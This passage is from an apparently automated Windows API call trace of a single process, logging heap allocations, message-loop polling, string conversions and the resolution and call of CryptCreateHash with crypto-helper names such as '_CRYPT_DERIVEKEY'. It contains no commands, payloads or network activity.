lpMsg=0x8cf4a8) returned 0 [0221.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04150 [0221.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0221.058] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0221.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.058] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.058] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0221.058] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0221.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0221.059] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f043b8 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0221.059] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0221.059] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fb0 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0221.059] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ff8 [0221.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0221.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f68 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f828 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0221.060] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.060] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5f8 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0221.061] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0221.061] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550a8 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.341] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.341] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f48 [0221.342] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0221.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0221.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0221.342] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.342] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0221.342] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0221.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.342] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55038 [0221.343] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0221.343] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.343] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.343] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0221.343] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fe8 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f045e8 [0221.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550b8 [0221.343] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.344] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0221.344] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0221.344] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0221.344] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51460 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f88 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55068 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51400 [0221.344] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0221.344] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51598 [0221.345] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptCreateHash", cchWideChar=16, lpMultiByteStr=0x2e51598, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptCreateHash", lpUsedDefaultChar=0x0) returned 16 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51598 | out: hHeap=0x970000) returned 1 [0221.345] GetProcAddress (hModule=0x756e0000, lpProcName="CryptCreateHash") returned 0x756feed0 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69ac8 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0221.345] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fe8 | out: hHeap=0x970000) returned 1 [0221.345] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ac8 | out: hHeap=0x970000) returned 1 [0221.346] CryptCreateHash (in: hProv=0xa5f958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x8cef48 | out: phHash=0x8cef48) returned 1 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e564e0 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69ac8 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51508 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51520 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51520 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51340 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51310 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.346] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.346] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51310 | out: hHeap=0x970000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51448 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514d8 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514d8 | out: hHeap=0x970000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51568 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513a0 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51478 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51550 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.347] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51550 | out: hHeap=0x970000) returned 1 [0221.347] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0221.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512c8 [0221.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51358 [0221.348] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fc8 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51358 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512c8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51208 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51268 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0221.348] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51250 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514f0 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51580 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51430 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514c0 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fb0 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0221.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0221.349] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e564e0 | out: hHeap=0x970000) returned 1 [0221.349] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f18 [0221.349] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f28 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e698c8 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0221.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0221.350] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550c8 [0221.350] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0221.350] HeapFree (in: hHeap=0x970000, dwFlags=0x0, 